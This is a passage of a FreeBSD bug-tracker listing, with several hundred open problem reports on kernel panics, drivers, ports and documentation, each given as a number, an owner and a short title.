setting country o kern/132622 philip [glxsb] [patch] glxsb(4) performs badly with ipsec o ports/132621 x11 x11/xorg tries to install event when deselected o ports/132607 security/denyhosts: command_interpreter warnings in /v o kern/132602 acpi [acpi] ACPI Problem with Intel SS4200: System does not o kern/132597 fs [tmpfs] [panic] tmpfs-related panic while interrupting o conf/132596 mux examples/cvsup/ports-supfile still oriented on cvsup p o usb/132594 usb USB subsystem causes page fault and crashes o bin/132591 [patch] dump(8): "dump W" uses %c instead of %d for re o ports/132588 ahze [PATCH] www/midori: update to 0.1.4 f ports/132579 cy [patch] sysutils/screen: fix build with externel compi o ports/132577 fjoe databases/oracle8-client: Appearence of connection (ph o ports/132576 delphij net/openldap24-server: multipying LDAP trees on the si o amd64/132574 amd64 [boot] [hang] Freeze on bootstrap loader (CD) using AT o ports/132573 ume [patch] security/cyrus-sasl2: fix compilation with gcc o kern/132554 net [ipl] There is no ippool start script/ipfilter magic t o kern/132553 ipfw [ipfw] ipfw doesn't understand ftp-data port o kern/132551 fs [zfs] ZFS locks up on extattr_list_link syscall p docs/132546 trhodes [patch] sync vm_map_lock(9) with recent locking change f i386/132535 gavin [acpi] if ACPI enabled, i can't change brightness leve o docs/132525 doc [PATCH] Fix documentation for atapicam(4) and umass(4) o conf/132515 stas ntpd_sync_on_start option in /etc/rc.conf misbehaves o kern/132511 multimedia [snd_hda] Probing ALC888 codec on ASRock K10N78-1394 f o kern/132497 rwatson [boot] [patch] Stale pre-5.x mbuf references in new Bo o conf/132483 rc rc.subr(8) [patch] setfib(1) support for rc.subr o conf/132476 rc [rc.d] [patch] add support setfib(1) in rc.d/routing o ports/132435 anders [patch] audio/xmp: add option to use tar(1) instead of o ports/132431 multimedia multimedia/ogmtools dvdxchap are not installed. o i386/132416 i386 Popup motherboard bios setup window when rebooting sys o ports/132403 x11 x11/xorg with Radeon X600 (R370): cannot re-initialize o ports/132402 girgen databases/postgresql83-server incorrect handling of co o kern/132397 fs reboot causes filesystem corruption (failure to sync b o amd64/132394 scsi [isp] - bad underruns with QLogic qla2300 and amd64 p docs/132392 trhodes [PATCH] remove leftovers of libkse from pthread.3 o ports/132391 multimedia/mplayer does not work with pulseaudio o amd64/132372 amd64 [ata] No disks found (nVidia nForce MCP55 sata control o bin/132367 [patch] less(1)/more(1) fchmod(2) `/dev/null' to 0600 o kern/132354 net [nat] Getting some packages to ipnat(8) causes crash o ports/132352 gahr [patch] databases/mysql-gui-tools hangs when picking s o www/132344 bugmeister [patch] www/en/cgi/query-pr.cgi broken base64 attachme o kern/132337 fs [zfs] [panic] kernel panic in zfs_fuid_create_cred f kern/132336 multimedia [snd_hda] Realtek ALC888 audio chipset does not work w o kern/132331 fs [ufs] [lor] LOR ufs and syncer s ports/132330 araujo New port: devel/psptoolchain-pspsdk-data s ports/132329 araujo New port: devel/psptoolchain-binutils s ports/132328 araujo New port: devel/psptoolchain-gcc s ports/132327 araujo New port: devel/psptoolchain-newlib s ports/132326 araujo New port: devel/psptoolchain-gdb s ports/132325 araujo New port: devel/psptoolchain s ports/132324 araujo New port: devel/psptoolchain-g++ s ports/132323 araujo New port: devel/psptoolchain-pspsdk s ports/132319 lwhsu [PATCH] chinese/scim-chewing: update to 0.3.3 s ports/132318 lwhsu [PATCH] chinese/libchewing: update to 0.3.2 o misc/132317 Snapshots are not properly mirrored between ftp.freebs o usb/132312 usb Xorg 7.4 halts USB controller o docs/132311 doc [patch] man5/nsmb.conf.5 o ports/132304 gnome ports/devel/dbus misses /var/db/dbus/machine-id in dis o bin/132302 [patch] smbutil(1): contrib/smbfs subr.c: saved passwo o ports/132294 stas [PATCH] lang/ruby18: Add option to build with Profile- o ports/132293 stas [PATCH] lang/ruby19: Add option to build with Profile- o kern/132285 net [carp] alias gives incorrect hash in dmesg o kern/132277 net [crypto] [ipsec] poor performance using cryptodevice f o ports/132274 portmgr [patch] Mk/bsd.port.mk: Revert USE_RC_SUBR changes mad o kern/132273 geom glabel(8): [patch] failing on journaled partition o kern/132271 [puc] [patch] puc support for a generic card o docs/132260 doc dhcpd(8) pid not stored in documented location o kern/132252 [ata] No CD/DVD devices found! o kern/132250 scsi [ciss] ciss driver does not support more then 15 drive o kern/132242 geom [gmirror] gmirror.ko fails to fully initialize o bin/132239 dhcpd(8) -d flag not working o kern/132238 [ral] ral driver does not support RT2860 o kern/132237 fs [msdosfs] msdosfs has problems to read MSDOS Floppy f ports/132231 gecko [PATCH] www/firefox3: Add option to build with Profile o i386/132230 i386 [boot] [reboot] 7.1-RELEASE /boot/loader non-functiona o ports/132229 ale Can't install databases/mysql51-server on freebsd 7.1- o ports/132213 anders [patch] mail/imap-uw: Add support for ~/mail as defaul o kern/132206 scsi [mpt] system panics on boot when mirroring and 2nd dri o docs/132193 doc [patch] description in the malo(4) manpage incorrect o docs/132190 doc EPERM explanation for send(2), sendto(2), and sendmsg( o bin/132182 uname(1) uses UNAME_ variables even if those are o conf/132179 net [patch] /etc/network.subr: ipv6 rtsol on incorrect wla f www/132178 www Soekris not listed amoung hardware vendors f kern/132176 pf [pf] pf stalls connection when using route-to [regress o kern/132172 [panic] Page fault panic in scioctl and console-kit-da o kern/132165 [uart] [lor] LOR slock and uart_hwmtx f ports/132157 lwhsu [repocopy] rename net-p2p/museekplus to net-p2p/museek o www/132149 www Problem with submitting emails to freebsd-questions@fr o ports/132146 stas lang/ruby19: Problem with fork in Ruby 1.9.1 o kern/132145 fs [panic] File System Hard Crashes p conf/132135 [PATCH] etc/crontab: HOME setting overrides o kern/132129 [crypto] Device crypto makes the kernel unbootable o bin/132114 randi [patch] add new 'docs' virtual category to sysinstall o docs/132113 doc [handbook] Update handbook jails creation o bin/132112 [patch] devd(8) unnecessarily reconfigures carp(4) int o i386/132110 i386 [build] /libexec/ld-elf.so.1: /lib/libc.so.7: version o kern/132107 net [carp] carp(4) advskew setting ignored when carp IP us o kern/132104 [kernel] [patch] kenv(1) buffer overflow o ports/132100 x11 x11/xorg: Xorg server forgets pointer map after xlock o ports/132096 ahze devel/distcc: fixing valid shell for user distcc in pk o ports/132093 python lang/python26: python's subprocess.py fails with 'Inte f kern/132092 bz [jail] jail can listen on *:port when jail_socket_unix o www/132091 www russian freebsd copyright - wrong translation o usb/132080 usb [patch] [usb] Kernel panic after NOMEM caused by rum c o ports/132074 tdb [patch] - update security/f-prot to version 6.0.1 f kern/132068 fs [zfs] page fault when using ZFS over NFS on 7.1-RELEAS o usb/132066 usb [ukbd] Keyboard failure USB keyboard DELL 760 o ports/132053 ahze devel/distcc: unfetchable Avahi patch support (distcc- p kern/132042 rnoland [drm] [panic] drm module crash the system when closing o ports/132041 x11 x11/xorg: Broken Intel video driver o usb/132036 usb [panic] page fault when connecting Olympus C740 camera o amd64/132019 amd64 [install] kernel trap 12 while installation o ports/132010 girgen databases/postgresql83-server: PostgreSQL Cluster Init o conf/132008 [PATCH] to allow using section/nosection in KERNCONF o kern/132001 [patch] [ixgb] driver update p bin/131999 chflags(1): unable to unset flags on symlinks when lin o kern/131995 fs [nfs] Failure to mount NFSv4 server o ports/131991 itetcu audio/musicpd 0.14.1_1 doesn't recognize URI scheme fo o ports/131969 nobutaka Port update: multimedia/libdvdnav - Proposal to switch o docs/131968 danger ipnat man page points to wrong directory o ports/131938 girgen vuxml submission for net/tptest o kern/131933 [uart] [patch] Cannot detect Sony Ericsson GC89 EDGE/W o ports/131930 x11 [PATCH] x11-servers/xorg-server coredumps on exit o docs/131918 doc [patch] Fixes for the BPF(4) man page o usb/131912 usb [uslcom] [patch] New devices using Silicon Labs chips o amd64/131906 amd64 [ata] SATA data corruption with Promise PDC20378 (amd6 o usb/131900 usb [usbdevs] [patch] Additional product identification co o kern/131876 rwatson [socket] FD leak by receiving SCM_RIGHTS by recvmsg wi f www/131863 www Please add to Commercial Vendors listing o bin/131861 mail(1) misses addresses when replying to all o bin/131853 cron(8): please add support for CRON_TZ and CRON_WITHI o kern/131817 ipfw [ipfw] blocks layer2 packets that should not be blocke o ports/131802 bsam New port: emulators/linux-f8-systemsim-cell o bin/131800 rpcbind(8) fails to start in jail f kern/131798 gavin [ukbd] usb keyboard doesn't work with motherboard inte f kern/131796 [ata] Introducing new USB or eSATA disks results in at o kern/131784 [lor] triple LOR after hard reboot o kern/131781 net [ndis] ndis keeps dropping the link o kern/131776 net [wi] driver fails to init o bin/131774 cvs(1) commits files then aborts f ports/131758 itetcu net/tightvnc in a jail stopped working after multiple o kern/131753 net [altq] [panic] kernel panic in hfsc_dequeue o ports/131726 x11 x11-servers/xorg-server: xorg server messes with my eh o kern/131718 [lor] kern_sysctl.c / acpi_video.c o ports/131696 x11 x11-servers/xorg-server: hald core dumps make X11 unus o docs/131684 doc [patch] articles/linux-comparison: replace Addenda by o ports/131664 skv lang/perl5.8: perl5.8.9 segfaults with devel/p5-ReadLi o docs/131626 pgj [patch] dump(8) "recommended" cache option confusing o docs/131625 pgj [patch] Typos in ed(1) man page o kern/131623 [libc] gethostbyname(2): output of gethostbyname_r doe f kern/131602 gavin [libc] sendfile(2) sends corrupted data o kern/131601 ipfw [ipfw] [panic] 7-STABLE panic in nat_finalise (tcp=0) o bin/131598 cperciva freebsd-update(8) doesn't interact well with custom ke o kern/131597 [kernel] c++ exceptions very slow on FreeBSD 7.1/amd64 o docs/131590 doc [patch] whitespace-only change of developers-handbook/ o docs/131584 pgj Update/correct Handbook section 30.5.7 IPMON Logging o usb/131583 usb [umass] Failure when detaching umass Device o ports/131580 port databases/frontbase upgraded to version 4.2.9 o ports/131579 kuriyama security/gnupg reads security/gnupg1 data incorrectly o usb/131576 usb [aue] ADMtek USB To LAN Converter can't send data f kern/131573 [mutex] lock_init() assumes zero-filled struct f kern/131571 gavin [apic] [panic] Running with APIC enabled crashes a Sup o bin/131567 net [socket] [patch] Update for regression/sockets/unix_cm o docs/131562 doc [patch] groff(1): don't corrupt man pages by replacing o kern/131558 ipfw [ipfw] Inconsistent "via" ipfw behavior o ports/131554 stas net-mgmt/flow-tools: flow-capture consuming all availa o kern/131549 net ifconfig(8) can't clear 'monitor' mode on the wireless o power/131548 ppc ofw_syscons no longer supports 32-bit framebuffer s ports/131537 jpaetzel [PATCH] devel/py-yaml: update to 3.08 o kern/131536 net [netinet] [patch] kernel does allow manipulation of su o ports/131526 lang/cmucl: CMUCL for FreeBSD 7 o ports/131524 hrs japanese/kinput2 with wnn failed by SEGV in amd64 o usb/131521 usb Registering Belkin UPS to usb_quirks.c o www/131493 www sshd(8) and sshd_config(8) on-line man pages outdated o amd64/131456 amd64 ACPI & ATA problems o ports/131452 portmgr [PATCH] Fix the problem usage MASTER_SITE_SUBDIR witho o kern/131448 Bad display while booting s ports/131447 jpaetzel [PATCH] multimedia/transcode: update to 1.1.0 o kern/131441 unionfs and/or nullfs not combineable o ports/131440 portmgr [feature request] add INDEX.bz2 and checksums to PACKA o ports/131439 portmgr inconsistencies on PACKAGESITEs o bin/131427 [patch] Add to fetch(1) an ability to limit a number o o i386/131426 i386 hald makes cdrom fail o bin/131415 keystrokes are unregulary sent to Geli when typing pas o ports/131413 danfe x11/nvidia-driver does'nt work after ABI libxcb change o docs/131370 keramida glabel(8): geom_label needs clarification in docs a bin/131369 delphij truss(1): truss -f fails to attach to child processes o i386/131367 rnoland Intel i845 video -> X makes system unusable requiring o bin/131365 net route(8): route add changes interpretation of network o kern/131360 fs [nfs] poor scaling behavior of the NFS server under lo o bin/131359 cperciva freebsd-update(8): freebsd-update tag file not updated o bin/131358 cperciva freebsd-update(8): Update servers for freebsd-update a s bin/131354 des ssh: SSH session hangs o kern/131353 geom [geom] gjournal(8) kernel lock o kern/131342 fs [nfs] mounting/unmounting of disks causes NFS to fail o bin/131341 fs makefs: error "Bad file descriptor" on the mount poin o ports/131331 multimedia multimedia/ffmpeg: doc/texi2pod.pl bad perl path o amd64/131314 amd64 [modules] [panic] large modules fail to load on amd64 o kern/131302 powerd(8): powernow0: set freq failed, err 6 o kern/131290 [hang]: How to completely freeze FreeBSD 7.1 under a n o ports/131274 roam mail/vpopmail: vpopmail + openldap core dump p bin/131250 bz [patch] ppp(8) proxyarp does not work o ports/131242 krion security/gsasl does not link if krb5-1.6.3_5 is instal o ports/131234 mi print/lyx: Propose making Lyx 1.5.x the default port o ports/131225 perl math/PDL: PDL-2.4.3_5: Unable to find PDL/pdldoc.db s ports/131218 www/privoxy+ipv6: /etc/rc: WARNING: run_rc_command: ca o amd64/131209 amd64 [panic] [bce] 7.1-STABLE amd64 crash - m0 NULL o kern/131162 net [ath] Atheros driver bugginess and kernel crashes o kern/131153 net [iwi] iwi doesn't see a wireless network o bin/131143 [patch] amd(8) causes annoying "embedded slash in map f usb/131123 usb [patch] re-add UQ_ASSUME_CM_OVER_DATA USB quirk o bin/131113 mount(8) hangs on attempt to remount as rw o ports/131112 ale [ PATCH ] databases/mysql51-server - Incompatible WITH o ports/131111 sem ports-mgmt/portupgrade-devel: completely removes packa o bin/131094 dhclient(8) sets wrong IP address f ports/131093 jpaetzel chrooting net/isc-dhcp30-server to aliased /home can c f kern/131087 net [ipw] [panic] ipw / iwi - no sent/received packets; iw o kern/131086 fs [ext2fs] [patch] mkfs.ext2 creates rotten partition o usb/131074 usb no run-time detection of usb devices plugged into exte o misc/131059 [tinybsd] [patch] tinybsd MFSROOT option suggests YES/ s ports/131055 danfe audio/ardour VST SDK distinfo o bin/131042 mount_ntfs(8) does not like fstab entry p kern/131038 bz [ip6] [panic] kernel panic in ip6_forward o kern/131037 geom [geli] Unable to create disklabel on .eli-Device o kern/131032 scsi [panic] hald causing panic in scsi_sg o ports/131016 x11 x11/xorg - xorg-7.4 renders system unusable! o bin/131013 pw(8) does not update NIS group file o kern/130998 [dtrace] DTrace stops tracing because of struct thread o ports/130995 ale Add php-fpm to lang/php5 o bin/130993 pkg_add(1): pkg_add -n falsely reports present local p f kern/130982 gavin [install] The installation hangs o kern/130979 fs [smbfs] [panic] boot/kernel/smbfs.ko o kern/130957 jhb [pci] /sys/dev/pci/pci.c revision 181771 breaks networ o bin/130954 ps(1): can not obtain which process take all CPU time f kern/130941 gavin [panic] [cd9660] [geom] unexpected crash due to page f o kern/130920 fs [msdosfs] cp(1) takes 100% CPU time while copying file o ports/130899 lev devel/subversion doesn't install with PREFIX != /usr/l o docs/130895 doc No man page installed for padlock(4) on amd64 sytstem f amd64/130885 amd64 sockstat(1) on amd64 does not work o bin/130874 [patch] fix typo in nvi(1) (subsitution -> substitutio o amd64/130864 amd64 [hang] Problem with copying files to a large partition o misc/130856 [build] [patch] make installworld work when WITHOUT_GA o bin/130855 [PATCH] add a chown(8)/chgrp(8) -x option to avoid cro o bin/130831 csh(1) core dumps after building libiconv-1.1x from s f kern/130820 net [ndis] wpa_supplicant(8) returns 'no space on device' o amd64/130817 amd64 FreeBSD does not support HP DL160G5 [regression] o ports/130811 doceng [PATCH] Floating point exceptions Ghostscript 8.63 (pr o kern/130794 [ata] hw.ata.ata_dma_limit without any effect p ports/130779 [PATCH] emulators/dosbox enable directserial passthrou f conf/130776 ip addresses like 10.1.1.1 with subnet mask 255.0.0.0 o ports/130772 shaun news/inn: innd core dumps at startup after perl upgrad o kern/130749 [libc] [patch] nscache.c/nscachedcli.c - return error o docs/130742 doc [patch] articles/geom-class: russian translation is mi o usb/130736 usb Page fault unplugging USB stick o kern/130735 scsi [cam] [patch] pass M_NOWAIT to the malloc() call insid o misc/130728 There are 4-clause BSDL files in src/ o kern/130726 [ata] DMA errors accessing multiple SATA channels o kern/130724 emulation [linprocfs] [patch] cpuinfo in linprocfs is dated, cau o ports/130719 www/nspluginwrapper installs plugins in the old direct o ports/130715 New Port:devel/binutils-2.19 o docs/130699 netchild MFILEs in /usr/src/tools/kerneldoc/subsys/Makefile are o kern/130698 [boot] FreeBSD 8-CURRENT does not start any more since o kern/130683 acpi [ACPI] shutdown hangs after syncing disks - ACPI race? o ports/130677 portmgr bsd.port.mk: Centralize handling of CPPFLAGS o ports/130675 [NEW PORT] devel/ocfpcsc: Open Card Framework to PC/SC o kern/130657 bz [ip6] [patch] ipv6 class option o bin/130655 randi sysinstall(8): no IPV4 if answer "no" when "Do you wan o ports/130629 skv [new port] lang/rakudo The Rakudo Perl 6 Compiler o kern/130628 net [nfs] NFS / rpc.lockd deadlock on 7.1-R o www/130627 www Submission for www/en/platforms/amd64/motherboards.sgm o kern/130621 scsi [mpt] tranfer rate is inscrutable slow when use lsi213 f ports/130569 multimedia multimedia/gstreamer: gnome-volume-control menu item d o conf/130555 net [rc.d] [patch] No good way to set ipfilter variables a p docs/130548 geom [patch] gjournal(8) man page is missing sysctls o ports/130547 mnag libspf2 listed in VuXML but no activity o ports/130541 new port: net/isc-dhcp41-server o docs/130530 doc atacontrol(8) does not mention SATA300 mode (or SATA15 o kern/130528 geom gjournal fsck during boot o kern/130525 net [ndis] [panic] 64 bit ar5008 ndisgen-erated driver cau o kern/130512 [ipmi] [patch] Various mistakes in IPMI watchdog handl o kern/130504 [libc] Serious bug in regular expression library (rege o amd64/130494 amd64 [boot] netbooting BTX fails on amd64 o amd64/130483 amd64 [mxge] MSI must be disabled when Myricom 10Gbps Card i o ports/130481 krion x11/xterm should be built with Unicode support by defa o ports/130479 apache www/apache20 and www/apache22 configure_args busted s kern/130478 x11 [request] Port Linux kernel stub of nouveau to FreeBSD o kern/130476 [build] [patch] Error in compiling kernel with device o conf/130414 rc [patch] rc services started with onestart are not stop o ports/130412 perky [UPDATE] databases/py-bsddb3 - From 4.5.0 -> 4.7.3 o docs/130394 jb [patch] Minor typo in dtrace(1M) man page o ports/130387 portmgr [PATCH] Mk/bsd.port.mk - Add macros for COPYTREE_WWW a a kern/130386 rwatson [patch] add locking for generic interface address mani o conf/130381 pf [rc.d] [pf] [ip6] ipv6 not fully configured when pf st o ports/130379 cy sysutils/screen : can't use it after a jail_attach() c o amd64/130368 amd64 [hang] Switching from xorg to console locks up compute o bin/130366 randi [patch] sysinstall(8): Minor correction to sysinstall f amd64/130365 gavin [ata] Elitegroup A780GM-A Chipset:AMD 780G&SB700 IDE c o docs/130364 doc Man page for top needs explanation of CPU states o misc/130361 FREEBSD 7.X does not install properly from FTP server o bin/130343 top(1): kvm_open: cannot open /proc/42997/mem corrupts f www/130340 www Submission for ISP page f ports/130335 brooks Port lang/llvm-gcc4: .././../gcc/libgcc2.c: In functio o ports/130331 danfe games/battletanks is broken on FreeBSD 7.x o kern/130330 scottl [mpt] [panic] Panic and reboot machine MPT driver when f kern/130329 gavin [myk] panic o usb/130325 usb [usb] [patch] fix tools/tools/usb/print-usb-if-vids.sh o kern/130311 net [wlan_xauth] [panic] hostapd restart causing kernel pa p bin/130298 stefanf sh(1) does not handle negation correctly in complex co o kern/130286 [patch] hifn(4) changes o kern/130261 [kernel] [panic] kernel panic in/below sys_pipe.c:knli o bin/130251 nm(1): 'nm -C' doesn't demangle any 't' symbol names o docs/130239 cperciva md5(1); md5 is reported to be compromised, but manpage o docs/130238 doc nfs.lockd man page doesn't mention NFSLOCKD option or f ports/130236 stefan libpbl-1.03 (databases/libpbl) is broken, spamprobe-1. o usb/130230 usb Samsung Electronics YP-U3 does not attach in 7.1-RELEA o kern/130229 fs [iconv] usermount fails on fs that need iconv o ports/130228 perky [UPDATE] korean/nabi to 0.99.3 o kern/130222 harti bsnmpd snmp_hostres.so always returns 100% CPU o ports/130218 haskell [UPDATE] lang/ghc - update to 6.10.1 o ports/130217 haskell [UPDATE] lang/ghc-doc - update to 6.10.1 o kern/130210 fs [nullfs] Error by check nullfs f ports/130209 www/typo3 upgrade removes configuration o usb/130208 usb Boot process severely hampered by umass0 error s ports/130199 chinsan [PATCH] audio/mp3info: take maintainership s ports/130198 chinsan [PATCH] audio/libshout2: take maintainership o ports/130183 hoek [PATCH] converters/xdeview switch to USE_TCL o kern/130171 [ata] UDMA CF cards do not work with FreeBSD p bin/130159 bz [patch] ppp(8) fails to correctly set routes o ports/130146 multimedia [PATCH] multimedia/transcode: update to 1.0.7 f kern/130133 kmacy [panic] [zfs] 'kmem_map too small' caused by make clea o bin/130132 ipfw [patch] ipfw(8): no way to get mask from ipfw pipe sho o usb/130122 usb [newusb] DVD drive detects as 'da' device o i386/130110 i386 [boot] BTX-Halted - booting with SAS/SATA Controller o kern/130109 net [ipfw] Can not set fib for packets originated from loc a kern/130107 dfr [devctl] [patch] in devctl_queue_data(): possible use f amd64/130103 vwe [hang] 7.1-RC X -> systemcrash o misc/130089 remko I can't find Myanmar BSD user group f usb/130076 vwe Panic when connecting USB camera o stand/130067 standards Wrong numeric limits in system headers? s ports/130065 pav devel/stlport update to 5.2.1 and problems f kern/130059 net [panic] Leaking 50k mbufs/hour o bin/130056 [patch] have nfsstat(1) use strtonum instead of atoi o kern/130021 Switching CAPS/NUM LOCK or virtual terminal freezes co a kern/130018 [ata] Marvell 6145 ata controller gets detected as PAT o bin/129989 cperciva portsnap(8) quietly forgets to fetch some ports f ports/129972 glarkin Update Port: benchmarks/lmbench [patch] - A system per a ports/129971 dinoex x11/gskrab: GSkrab does not compile on -current o www/129969 www Need 301 moved permanently errors returned for www.fre o bin/129967 des unzip(1): /usr/bin/unzip missing -v option. o bin/129965 [patch] ps(1): ps -lH doesn't show the proper CPU# o docs/129962 usb [newusb] usbconfig(8) refers to non-existant usb2_core o i386/129953 acpi [acpi] ACPI timeout (CDROM) with Shuttle X27D o usb/129945 usb [usbdevs] [patch] add u3g support for Longcheer WM66 U o ports/129930 sem ports-mgmt/portupgrade - portinstall tries to install o www/129923 www Need stylesheet for FreeBSD Subversion DAV tree o ports/129891 sem ports-mgmt/portupgrade fails to recognize variations o o amd64/129889 amd64 [boot] [hang] The booting process stops at the line mo o kern/129861 pf [pf] [patch] Argument names reversed in pf_table.c:_co o ports/129859 kuriyama net/relayd - ssl random number generation p usb/129858 remko [usb] [patch] Need to add quirk to da_scsi.c to suppor o bin/129855 [patch] ipcs(1) integer overflow with UIDs bigger than o ports/129852 cjh [UPDATE] www/qdecoder o ports/129824 hrs print/acroread8 - help viewer does not work o bin/129814 [patch] support of per script nice(1) value in periodi o ports/129813 delphij [PATCH] net/openldap24-server: RC script assumes too m o ports/129802 mnag net-mgmt/Ettercap 7.3 wont build o ports/129800 multimedia Update port: multimedia/ffmpeg avoid crash in multimed p kern/129793 bz [ip6] [patch] Locking related leaks in the kernel (rou o ports/129790 lioux [PATCH] net-p2p/mldonkey: Fix rc start script o kern/129784 [ata] [patch] SATA port multiplier disk detect bugs in o ports/129782 tmclaugh [PATCH] security/sudo: update to 1.7.0 o bin/129771 randi sysinstall(8): 7.1 RC1 sysinstalls installs boot0 even o usb/129766 usb [usb] plugging in usb modem HUAWEI E226 panics system o bin/129764 [patch] unbreak sbin/newfs build for the 8-CURRENT o bin/129762 sysinstall(8) doesn't seem to support GPT for EFI boar o kern/129760 fs [nfs] after 'umount -f' of a stale NFS share FreeBSD l o usb/129758 usb [uftdi] [patch] add Pyramid LCD usb support o kern/129750 net [ath] Atheros AR5006 exits on "cannot map register spa o ports/129741 portmgr [patch] bsd.port.mk: support systems that have been bu o kern/129730 qingli [arp]: respond with wrong ARP. o amd64/129721 amd64 [hang] Motherboard K9N2G Neo-FD hangs on boot of 7.0-R f kern/129719 net [nfs] [panic] Panic during shutdown, tcp_ctloutput: in o kern/129713 [pci] pci-pci bridge quirk with ich7 chipset not handl o bin/129706 top(1) corrupts SIZE field when a process allocates 20 o conf/129697 [patch] fix misbehavior of periodic/daily/100.clean-di o ports/129687 obrien [patch] unbreak net/tcpshow for gcc-4.2.1 a docs/129684 trhodes gcache.8 man page missing o ports/129682 sobomax net/asterisk app_meetme issue f ports/129677 /usr/ports/sysutils/aaccli Bad system call: 12 (core d o kern/129674 geom [geom] gjournal root did not mount on boot o usb/129673 usb [uhci] uhci (uhub) confused on replugging USB 1.1 scan o docs/129671 doc New TCP chapter for Developer's Handbook (from rwatson o amd64/129667 amd64 [ata] Elitegroup A780GM-A IDE controller not recognize p kern/129665 rik [uart] Oxford OX16PCI958 8-serial multiport card is no o kern/129663 rik [uart] Timedia-based 8-serial multiport card: only two o kern/129645 geom gjournal(8): GEOM_JOURNAL causes system to fail to boo p bin/129630 [patch] bsnmpd(1): teach hostres module about ZFS o ports/129626 perl lang/p5-Tcl segfaults on i386 and amd64 on FreeBSD 7 o www/129622 www amd64 motherboard - new board to add to the supported o bin/129620 [patch] Incorrect bzip2(1) behavior o kern/129618 acpi [acpi] Problem with ACPI on HP Pavilion DV2899 laptop o kern/129604 multimedia [pcm]: Sound stops with error: pcm0:virtual:dsp0.vp0: o kern/129602 scsi [ahd] ahd(4) gets confused and wedges SCSI bus o kern/129580 net [ndis] Netgear WG311v3 (ndis) causes kenel trap at boo o ports/129579 cjh Consider upgrading korean/baekmukfonts-{bdf,ttf} to 2. o ports/129577 des [PATCH] sysutils/munin-main: does not honor BATCH/PACK o ports/129576 des [PATCH] sysutils/munin-node: does not honor BATCH/PACK f misc/129573 FreeBSD-7.1-RC1 fails to install man pages and doc dis o kern/129563 acpi [acpi] sleep broken on IBM/Lenovo T61 in amd64 mode p stand/129554 standards lp(1) [patch] Implement -m and -t options o ports/129553 hrs [patch] print/acroread8 can't launch some programs due o i386/129550 i386 [pae] [kqueue] crash with PAE kernel o bin/129541 [nis] passwd(1) cannot be forced to "yp" mode in some o stand/129524 standards FreeBSD 7.0 isnt detecting my hardrives with raid5 o usb/129522 usb [ubsa] [patch] add support for ZTE AC8700 modem o ports/129518 gerald lang/gcc42 - g++42 uses wrong libstdc++.so and libgcc_ o kern/129517 net [ipsec] [panic] double fault / stack overflow o kern/129508 net [carp] [panic] Kernel panic with EtherIP (may be relat o usb/129500 usb [umass] [panic] FreeBSD Crashes when connecting SanDis o kern/129488 fs [smbfs] Kernel "bug" when using smbfs in smbfs_smb.c: o ports/129478 multimedia/acidrip: patch file to commit to ports p kern/129477 delphij [request] resolver(5): knob to force standards complia o docs/129464 tabthorpe using packages system o ports/129435 java/jakarta-commons-dbcp not BROKEN on jdk15 o bin/129431 cperciva freebsd-update(8) fetch fails because phttpget fails p o amd64/129426 amd64 [panic] FreeBSD 7.0 crash after subdiskXX: detached o ports/129422 ume [patch] mail/cyrus-imapd23: add patch for autocreate I o ports/129411 nemoliu Fix shutdown script for www/tomcat6 o bin/129405 [patch] tcsh(1) vfork bugs o www/129401 www FreeBSD Multimedia page should automatically pick up Y p docs/129398 trhodes [patch] ddb(8): various tweaks to ddb-related man page o bin/129378 csh(1) / tcsh(1) loses foreground process group [regre o kern/129373 [ata] [panic] Panic in ata-queue, VIA CLE266, 7.1-BETA s ports/129372 itetcu update mail/altermime to .3.10 o kern/129352 net [xl] [patch] xl0 watchdog timeout o www/129331 www Supported motherboard Gigabyte GA-MA78GPM-DS2H o kern/129316 [sio] [panic] kernel panic (pcpu.h:195; support.s:499) o amd64/129315 amd64 [boot] [reboot] amd64 motherboard: Intel DG965WH mothe o usb/129311 usb [usb] [panic] Instant crash with an USB card reader o ports/129300 obrien [vuxml] editors/vim: document CVE-2008-3432 o bin/129287 [request] powerd(8) should grow signals to switch betw o docs/129281 blackend Audio CD ripping/duplication shouldn't recommend the u o misc/129267 [build] make buildworld errors on RELENG_7 with gcc 4. o kern/129261 simokawa [firewire] Kernel crash on boot with disconnected fire o usb/129251 usb [usbdevs] [patch] Liebert UPS being assigned uhid and s bin/129248 [request] FreeBSD's syslog(8) can't support log encodi o kern/129245 geom [geom] gcache is more suitable for suffix based provid o kern/129231 fs [ufs] [patch] New UFS mount (norandom) option - mostly f ports/129224 brooks ports/lang/llvm-gcc4 compilation error: .././../gcc/l o kern/129219 net [ppp] Kernel panic when using kernel mode ppp o ports/129210 portmgr [patch] Instrument bsd.port.mk to detect unstripped bi o ports/129198 clsung databases/p5-DBD-SQLite fails when SQLite is compil o kern/129197 net [panic] 7.0 IP stack related panic o docs/129196 doc Inconsistent errno in strtol() o ports/129190 kde x11/kde4: KDE4 kdm doesn't launch o usb/129173 usb [uplcom] [patch] Add support for Corega CG-USBRS232R a o kern/129172 [libc] signals are not delivered always o bin/129170 keramida [patch] fix truss(1) segv for unknown syscall o kern/129169 emulation [linux] [patch] Linux Emulation ENOTCONN error using n o ports/129165 perky [Update]databases/zodb3:update to 3.8.1 o kern/129164 [kernel] Wrong priority value for normal processes o kern/129152 fs [panic] non-userfriendly panic when trying to mount(8) f i386/129149 vwe [panic] 6.4-RC2 page faults during kernel-mode boot pr o kern/129148 fs [zfs] [panic] panic on concurrent writing & rollback o ports/129147 gecko can't use deskutils/lightning-xpi under current amd64 o kern/129135 net [vge] vge driver on a VIA mini-ITX not working o kern/129132 [nfs] 7.1-Beta2 nfsd cannot lock o kern/129125 [psm] psm0: failed to reset the aux device. o ports/129122 openoffice editors/openoffice.org-3: building OpenOffice.org-3.0. o kern/129103 ipfw [ipfw] IPFW check state does not work =( o kern/129098 [panic] vinvalbuf: dirty bufs on 6-STABLE o docs/129095 doc ipfw(8): Can not check that packet originating/destine o kern/129093 ipfw [ipfw] ipfw nat must not drop packets s ports/129071 pgollucci net-mgmt/net-snmp: net-snmpd pegs cpu on sparc64 and f o kern/129059 fs [zfs] [patch] ZFS bootloader whitelistable via WITHOUT o kern/129053 [lor] lock order reversal with printf(9) o bin/129052 ps(1) %cpu column reports misleading data for threaded f kern/129040 gavin [install] Lockup during boot - Cannot install the OS o kern/129036 ipfw [ipfw] 'ipfw fwd' does not change outgoing interface n o docs/129024 keramida [patch] ipfw(8) improvements o bin/129014 [regression] ftp(1) cannot bind to specific source IP o conf/128994 UPDATING falsly states DTrace bindings are built by de s usb/128990 usb [usb] u3g does not handle RTS/CTS available on for exa p arm/128987 stas [patch] Fix at91_mci and use 1-bit mode. f amd64/128978 amd64 [install] FreeBSD 6.3 